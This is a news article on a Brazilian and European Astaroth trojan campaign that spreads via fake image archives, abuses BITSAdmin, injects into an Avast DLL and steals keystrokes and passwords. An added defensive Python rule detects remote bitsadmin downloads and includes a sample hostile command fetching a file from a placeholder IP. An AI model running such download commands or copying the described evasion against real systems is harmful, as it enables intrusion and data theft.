Astaroth, the fake image that steals your data

A trojan disguised as an image manages to infect PCs and evade detection by antivirus software. Here's how Astaroth works.

A new campaign using the Astaroth trojan is currently underway in Brazil and Europe. The trojan is already well known to security researchers because it infected thousands of computers worldwide in the last three months of 2018. The infection starts from a fake image spread via email.

The new strain was discovered by Cybereason researchers. It abuses BITSAdmin, a legitimate Microsoft Windows command-line utility for managing background download and upload jobs, to retrieve malicious code. This variant of Astaroth is distributed through spam email campaigns, and the infection starts when the user opens a 7-Zip archive that is attached to the email, reached through a link, or disguised as a GIF or JPG image. The archive contains a .lnk shortcut file which, when opened, initiates the actual infection. The malware then connects to a server and starts collecting information from the infected computer, and uses BITSAdmin to fetch further images and files from another server.
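Because this chain relies on a legitimate Windows tool, BITSAdmin, pulling content from a remote server, a defender can look for bitsadmin.exe transfers that name a URL, and treat them as more suspicious when the parent process is a script interpreter of the kind a shortcut file would launch. The block below is an added example, not code from the article or from Cybereason: it runs such a rule over constructed process-creation events, and the field names, file paths and the 203.0.113.10 address are invented for illustration.

```python
import ntpath
import re
from typing import Dict, List, Optional

# Constructed process-creation events (not real telemetry), loosely modelled
# on Sysmon Event ID 1 fields; one event per line, values in double quotes.
SAMPLE_EVENTS = [
    'Image="C:\\Windows\\System32\\bitsadmin.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="bitsadmin /transfer job /download /priority high http://203.0.113.10/pic.jpg C:\\Users\\Public\\pic.jpg"',
    'Image="C:\\Windows\\System32\\bitsadmin.exe" ParentImage="C:\\Program Files\\Backup\\agent.exe" '
    'CommandLine="bitsadmin /list /allusers"',
    'Image="C:\\Windows\\explorer.exe" ParentImage="C:\\Windows\\System32\\userinit.exe" CommandLine="explorer.exe"',
]

# Interpreters that a .lnk shortcut typically launches; a BITS transfer spawned
# from one of these deserves a higher severity than one from a backup service.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Split a key=value event line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding for a bitsadmin /transfer from a remote URL, else None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    if image != "bitsadmin.exe" or "/transfer" not in cmd.lower():
        return None
    url = URL_RE.search(cmd)
    if not url:
        return None  # local-only transfer, not the remote fetch described above
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    return {
        "rule": "bitsadmin-remote-download",
        "severity": "high" if parent in SCRIPT_HOSTS else "medium",
        "parent": parent,
        "url": url.group(0),
    }


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Run the rule over every event line and collect the findings."""
    return [f for f in (classify(parse_event(l)) for l in lines) if f]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

On the constructed events only the first line is flagged: a transfer from a URL whose parent is cmd.exe, rated high; the `/list` invocation from the backup agent is ignored.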

Immune to antivirus

The most dangerous aspect of Astaroth, and what distinguishes it from previous infections based on this trojan, is its ability to modify a .dll file belonging to the Avast antivirus by injecting malicious code into it. Once that file is infected, the trojan uses it to gather more information about the machine it is running on and to download additional code. It also manages to hide itself from scans performed with Avast.

What Astaroth does

The Cybereason research team found that once the trojan has successfully infiltrated a machine, it records the user's keystrokes, intercepts their calls to the operating system and continuously collects the contents of the clipboard. With these methods it harvests significant amounts of personal information, including details of the user's bank accounts. If the infected PC is connected to a LAN, Astaroth also collects the network access passwords of the other computers on the same LAN, email account passwords, Messenger account data and Internet Explorer passwords.

Astaroth first appeared online in 2017 and went on to infect thousands of PCs, especially in South America. It went through several evolutions before arriving at the current one. A previous version, for example, hid in fake Amazon emails containing confirmations of orders the user had never placed; if the user clicked on the links in the email, the infection started.